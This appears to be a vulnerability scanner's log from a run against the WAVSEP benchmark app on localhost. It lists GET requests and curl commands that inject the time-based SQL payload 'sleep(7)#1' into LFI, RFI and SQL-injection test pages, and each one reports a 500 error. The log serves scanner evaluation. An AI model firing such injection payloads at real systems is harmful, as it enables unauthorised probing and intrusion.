curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=sleep%287%29%231&password=textvalue2"